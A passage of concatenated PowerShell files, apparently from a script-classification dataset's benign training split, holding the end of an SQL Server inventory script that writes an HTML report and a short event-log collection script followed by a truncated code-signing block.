"</td></tr></table><br>" } function getHtmlParagraph1 { param([string] $text) return "<br><br><p class=""styleHeader1"">$text</p>"; } function getHtmlParagraph2 { param([string] $text) return "<br><br><p class=""styleHeader2"">$text</p>"; } function getHtmlTableStart { param([string[]] $cols) [string] $tbl = "<table class=""styleTable""><colgroup>"; [string] $tr = "<tr>"; foreach ($col in $cols) { $tbl += "<col></col>"; $tr += "<th class=""styleColHeader""><span>$col</span></th>"; } return $tbl + "</colgroup>" + $tr + "</tr>"; } function getHtmlTableAddRow { param([string[]] $cols) [string] $tr = "<tr>"; foreach ($col in $cols) { $tr += "<th class=""styleCol""><span>$col</span></th>"; } return $tr + "</tr>"; } function getHtmlTableEnd { return "</table>"; } [SqlServerInstance[]] $servers = @(); Write-Host ((Get-Date -format yyyy-MM-ddTHH:mm:ss) + ": Started enumerating SQL Server; this could take a while ..."); [Data.DataTable] $table = [Microsoft.SqlServer.Management.Smo.SmoApplication]::EnumAvailableSqlServers($false); Write-Host ((Get-Date -format yyyy-MM-ddTHH:mm:ss) + ": " + $table.Rows.Count.ToString() + " server found."); foreach ($row in $table) { [SqlServerInstance] $srv = New-Object "SqlServerInstance"; $srv.Name = $row.Item("Name").ToString(); $srv.Server = $row.Item("Server").ToString(); $srv.Instance = $row.Item("Instance").ToString(); if ($srv.Instance -eq [string]::Empty) { $srv.Instance = "MSSQLSERVER"; } Write-Host ((Get-Date -format yyyy-MM-ddTHH:mm:ss) + ": Fetching infos from " + $srv.Name); $srv.IsClustered = $row.Item("IsClustered"); $srv.Version = $row.Item("Version").ToString(); $srv.IsLocal = $row.Item("IsLocal"); $srv.IpAddress = getIpAddress $srv.Server; if ($script:checkServices -eq $true) { $srv.Services = getServicesInfo $srv.Server $srv.Instance; } if ($script:getServerInfo -eq $true) { $srv.ServerInfo = getServerInfo $srv.Name; } $servers += $srv; } Write-Host ((Get-Date -format yyyy-MM-ddTHH:mm:ss) + ": Started creating Html document."); $sb = New-Object System.Text.StringBuilder ""; $sb.Append( (getHtmlPageHeader) ) | Out-Null; $sb.AppendLine( (getHtmlParagraph1 "SQL Server Instances Overview") ) | Out-Null; $sb.AppendLine( (getHtmlTableStart @("Name", "Ip Address", "Instance", "Version")) ) | Out-Null; foreach ($entry in ($servers | Sort-Object Server, Instance)) { [string] $link = "<a href="" $sb.AppendLine( (getHtmlTableAddRow @($link, $entry.IpAddress, $entry.Instance, $entry.Version)) ) | Out-Null; } $sb.AppendLine( (getHtmlTableEnd) ) | Out-Null; foreach ($entry in ($servers | Sort-Object Server, Instance)) { [string] $link = "<a name=""" + $entry.Name + """>" + $entry.Name + "</a>"; $sb.AppendLine( (getHtmlParagraph1 $link) ) | Out-Null; if ($entry.ServerInfo -eq $null) { $sb.AppendLine( (getHtmlParagraph2 "No Details of SQL Server Database Engine available") ) | Out-Null; } else { $sb.AppendLine( (getHtmlParagraph2 "Details of SQL Server Database Engine") ) | Out-Null; $sb.AppendLine( (getHtmlTableStart @("Property", "Value")) ) | Out-Null; $sb.AppendLine( (getHtmlTableAddRow @("Edition", $entry.ServerInfo.Edition)) ) | Out-Null; $sb.AppendLine( (getHtmlTableAddRow @("EngineEdition", $entry.ServerInfo.EngineEdition)) ) | Out-Null; $sb.AppendLine( (getHtmlTableAddRow @("Language", $entry.ServerInfo.Language)) ) | Out-Null; $sb.AppendLine( (getHtmlTableAddRow @("TcpEnabled", $entry.ServerInfo.TcpEnabled)) ) | Out-Null; $sb.AppendLine( (getHtmlTableAddRow @("InstallSharedDirectory", $entry.ServerInfo.InstallSharedDirectory)) ) | Out-Null; $sb.AppendLine( (getHtmlTableAddRow @("InstallDataDirectory", $entry.ServerInfo.InstallDataDirectory)) ) | Out-Null; $sb.AppendLine( (getHtmlTableAddRow @("MasterDBPath", $entry.ServerInfo.MasterDBPath)) ) | Out-Null; $sb.AppendLine( (getHtmlTableAddRow @("MasterDBLogPath", $entry.ServerInfo.MasterDBLogPath)) ) | Out-Null; $sb.AppendLine( (getHtmlTableAddRow @("ErrorLogPath", $entry.ServerInfo.ErrorLogPath)) ) | Out-Null; $sb.AppendLine( (getHtmlTableEnd) ) | Out-Null; } $sb.AppendLine( (getHtmlParagraph2 "Services of the Instance") ) | Out-Null; if (($script:checkServices -eq $true) -and ($entry.Services -ne $null)) { $sb.AppendLine( (getHtmlTableStart @("Name", "Caption", "StartMode", "Started", "State", "Status", "StartName")) ) | Out-Null; foreach ($srvc in ($entry.Services | Sort-Object Name)) { $sb.AppendLine( (getHtmlTableAddRow @($srvc.Name, $srvc.Caption, $srvc.StartMode, $srvc.Started, $srvc.State, $srvc.Status, $srvc.StartName)) ) | Out-Null; } $sb.AppendLine( (getHtmlTableEnd) ) | Out-Null; } if ($entry.ServerInfo.Databases -ne $null) { $sb.AppendLine( (getHtmlParagraph2 "Databases") ) | Out-Null; $sb.AppendLine( (getHtmlTableStart @("Name", "R-Model", "Status", "Size MB", "Available", "Last Backup")) ) | Out-Null; foreach ($dbEntry in ($entry.ServerInfo.Databases | Sort-Object Name)) { $sb.AppendLine( (getHtmlTableAddRow @($dbEntry.Name, $dbEntry.RecoveryModel, $dbEntry.Status, $dbEntry.Size, $dbEntry.SpaceAvailable, $dbEntry.LastBackup)) ) | Out-Null; } $sb.AppendLine( (getHtmlTableEnd) ) | Out-Null; } } $sb.Append("</body></html>") | Out-Null; Set-Content $filename $sb.ToString(); Write-Host ((Get-Date -format yyyy-MM-ddTHH:mm:ss) + ": Finished"); Invoke-Item $filename;
combined_dataset/train/non-malicious/sample_12_14.ps1
sample_12_14.ps1
#Collect Event Logs for VSSBackup package $EventLogNames = @("Microsoft-Windows-Backup", "Microsoft-Windows-VHDMP/Operational", "System", "Application") Run-DiagExpression .\TS_GetEvents.ps1 -EventLogNames $EventLogNames -SectionDescription "Event Logs" # SIG # Begin signature block # MIIoRgYJKoZIhvcNAQcCoIIoNzCCKDMCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBhCZjaShyUZcCR # SzMx/RnqJ7Ar84Jk1AkyqREeoWaYY6CCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHZ1BeGg52P8sDTxh+wbthLR # do0fuM7xZeEEm5Xp8KpLMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAKEVnILTe/VL65yxf+L3iRAN4zXC28QTrjwJ/l6MheBchoGFj1F54kg1l # lC2OFmjxliuNmxUCfs1fgog8dffohl7/1wzOsvF79WhX7aarqtoZYEc34VheEMcR # w3ZxkKm3S/g8jYzTdKrsnYJ8sqgoAIaxmadb8DwGXbwnLh4Dsje8/TWBWSQ64JOC # Lc2GpawgmAP8LxVxqrgezxBTlbMkdlRWDz973inSJy0iLIvBTWQNXbgfz+3PLUmJ # LQ2U0JMUl4naT97hbnxn7O2uz39o9ts7e+yqhEVWtclsCZfUjjHISFRuW6ykkA2w # TdgTu82b+03aRLPGe8NdpwGdXLoZjKGCF7AwghesBgorBgEEAYI3AwMBMYIXnDCC # F5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq # hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBz21cmGHZtVK836oPjaZmKR9zFLs1EYlPMUjmqcMkMHwIGZutLSAPd # GBMyMDI0MTAyODExNDA0My44MTZaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo0QzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAAB/xI4fPfBZdahAAEAAAH/MA0G # CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0 # MDcyNTE4MzExOVoXDTI1MTAyMjE4MzExOVowgdMxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w # ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjRDMUEt # MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAyeiV0pB7bg8/qc/mkiDd # JXnzJWPYgk9mTGeI3pzQpsyrRJREWcKYHd/9db+g3z4dU4VCkAZEXqvkxP5QNTtB # G5Ipexpph4PhbiJKwvX+US4KkSFhf1wflDAY1tu9CQqhhxfHFV7vhtmqHLCCmDxh # ZPmCBh9/XfFJQIUwVZR8RtUkgzmN9bmWiYgfX0R+bDAnncUdtp1xjGmCpdBMygk/ # K0h3bUTUzQHb4kPf2ylkKPoWFYn2GNYgWw8PGBUO0vTMKjYD6pLeBP0hZDh5P3f4 # xhGLm6x98xuIQp/RFnzBbgthySXGl+NT1cZAqGyEhT7L0SdR7qQlv5pwDNerbK3Y # SEDKk3sDh9S60hLJNqP71iHKkG175HAyg6zmE5p3fONr9/fIEpPAlC8YisxXaGX4 # RpDBYVKpGj0FCZwisiZsxm0X9w6ZSk8OOXf8JxTYWIqfRuWzdUir0Z3jiOOtaDq7 # XdypB4gZrhr90KcPTDRwvy60zrQca/1D1J7PQJAJObbiaboi12usV8axtlT/dCeP # C4ndcFcar1v+fnClhs9u3Fn6LkHDRZfNzhXgLDEwb6dA4y3s6G+gQ35o90j2i6am # aa8JsV/cCF+iDSGzAxZY1sQ1mrdMmzxfWzXN6sPJMy49tdsWTIgZWVOSS9uUHhSY # kbgMxnLeiKXeB5MB9QMcOScCAwEAAaOCAUkwggFFMB0GA1UdDgQWBBTD+pXk/rT/ # d7E/0QE7hH0wz+6UYTAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf # BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww # bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m # dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El # MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF # BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEAOSNN5MpLiyun # m866frWIi0hdazKNLgRp3WZPfhYgPC3K/DNMzLliYQUAp6WtgolIrativXjOG1lI # jayG9r6ew4H1n5XZdDfJ12DLjopap5e1iU/Yk0eutPyfOievfbsIzTk/G51+uiUJ # k772nVzau6hI2KGyGBJOvAbAVFR0g8ppZwLghT4z3mkGZjq/O4Z/PcmVGtjGps2T # CtI4rZjPNW8O4c/4aJRmYQ/NdW91JRrOXRpyXrTKUPe3kN8N56jpl9kotLhdvd89 # RbOsJNf2XzqbAV7XjV4caCglA2btzDxcyffwXhLu9HMU3dLYTAI91gTNUF7BA9q1 # EvSlCKKlN8N10Y4iU0nyIkfpRxYyAbRyq5QPYPJHGA0Ty0PD83aCt79Ra0IdDIMS # uwXlpUnyIyxwrDylgfOGyysWBwQ/js249bqQOYPdpyOdgRe8tXdGrgDoBeuVOK+c # RClXpimNYwr61oZ2/kPMzVrzRUYMkBXe9WqdSezh8tytuulYYcRK95qihF0irQs6 # /WOQJltQX79lzFXE9FFln9Mix0as+C4HPzd+S0bBN3A3XRROwAv016ICuT8hY1In # yW7jwVmN+OkQ1zei66LrU5RtAz0nTxx5OePyjnTaItTSY4OGuGU1SXaH49JSP3t8 # yGYA/vorbW4VneeD721FgwaJToHFkOIwggdxMIIFWaADAgECAhMzAAAAFcXna54C # m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp # Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy # MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B # AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51 # yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY # 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9 # cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN # 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua # Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74 # kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2 # K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5 # TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk # i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q # BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri # Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC # BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl # pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB # FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y # eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA # YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU # 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny # bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw # MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w # Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp # b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm # ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM # 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW # OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4 # FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw # xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX # fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX # VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC # onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU # 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG # ahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo0QzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaIjCgEBMAcGBSsOAwIaAxUAqROMbMS8JcUlcnPkwRLFRPXFspmggYMw # gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF # AAIFAOrJ2mUwIhgPMjAyNDEwMjgwOTM5NDlaGA8yMDI0MTAyOTA5Mzk0OVowdzA9 # BgorBgEEAYRZCgQBMS8wLTAKAgUA6snaZQIBADAKAgEAAgIFPAIB/zAHAgEAAgIU # KTAKAgUA6ssr5QIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAow # CAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQAuUNJmV2WE # mZgWBM3JyTJwjd7eR8W+zIfvWlXZUbOA7OoenLTmvdaHyPjIBqzVVX+OsCmMA4rC # SBiFVyt7vD7pw6C0gQ7G74pHE4Gq9isau89V6yFZb0cqWgcxpcvR5+XFiKoxtNrZ # +ICNQNLSApRh1tFZ9AnOa6pEAE5pAKzFFp/iKZGVnedWcWiD6dyYPjiJ10ZllDJA # kIeS/woyKVVqERxiqfnvmh4F99BaY+397LAfLvWQaQ7aY8kNavDIwAwm/WFtYzSw # 